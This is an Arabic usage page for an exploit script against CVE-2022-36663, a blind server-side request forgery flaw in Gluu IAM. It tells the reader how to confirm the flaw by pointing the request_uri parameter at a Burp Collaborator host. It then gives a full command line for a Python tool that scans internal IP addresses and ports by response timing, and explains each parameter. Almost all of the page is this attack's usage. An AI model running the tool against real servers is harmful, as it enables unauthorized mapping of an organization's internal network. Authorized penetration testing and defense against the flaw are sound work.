
ماسح الشبكة الداخلية عبر ثغرة SSRF العمياء في Gluu IAM
ماسح الشبكة الداخلية عبر ثغرة SSRF العمياء في Gluu IAM
Gluu IAM معرض لثغرة SSRF العمياء التي يمكن استغلالها لمسح الشبكة الداخلية بحثًا عن المنافذ المفتوحة اعتمادًا على أوقات الاستجابة.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
للتحقق مما إذا كان الهدف معرضًا للثغرة، أضف &request_uri=http://burpcollab إلى طلب /oxauth/restv1/authorize وتفقد بشكل دوري بحثًا عن حركة مرور واردة من الخادم الهدف.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url - عنوان خادم Gluu IAM
IP - عنوان IP الداخلي أو الشبكة الفرعية التي تريد مسحها
Port - المنفذ الداخلي الذي تريد مسحه
AR - عنوان URL لطلب التفويض الذي ينتهي بمعامل request_uri فارغ
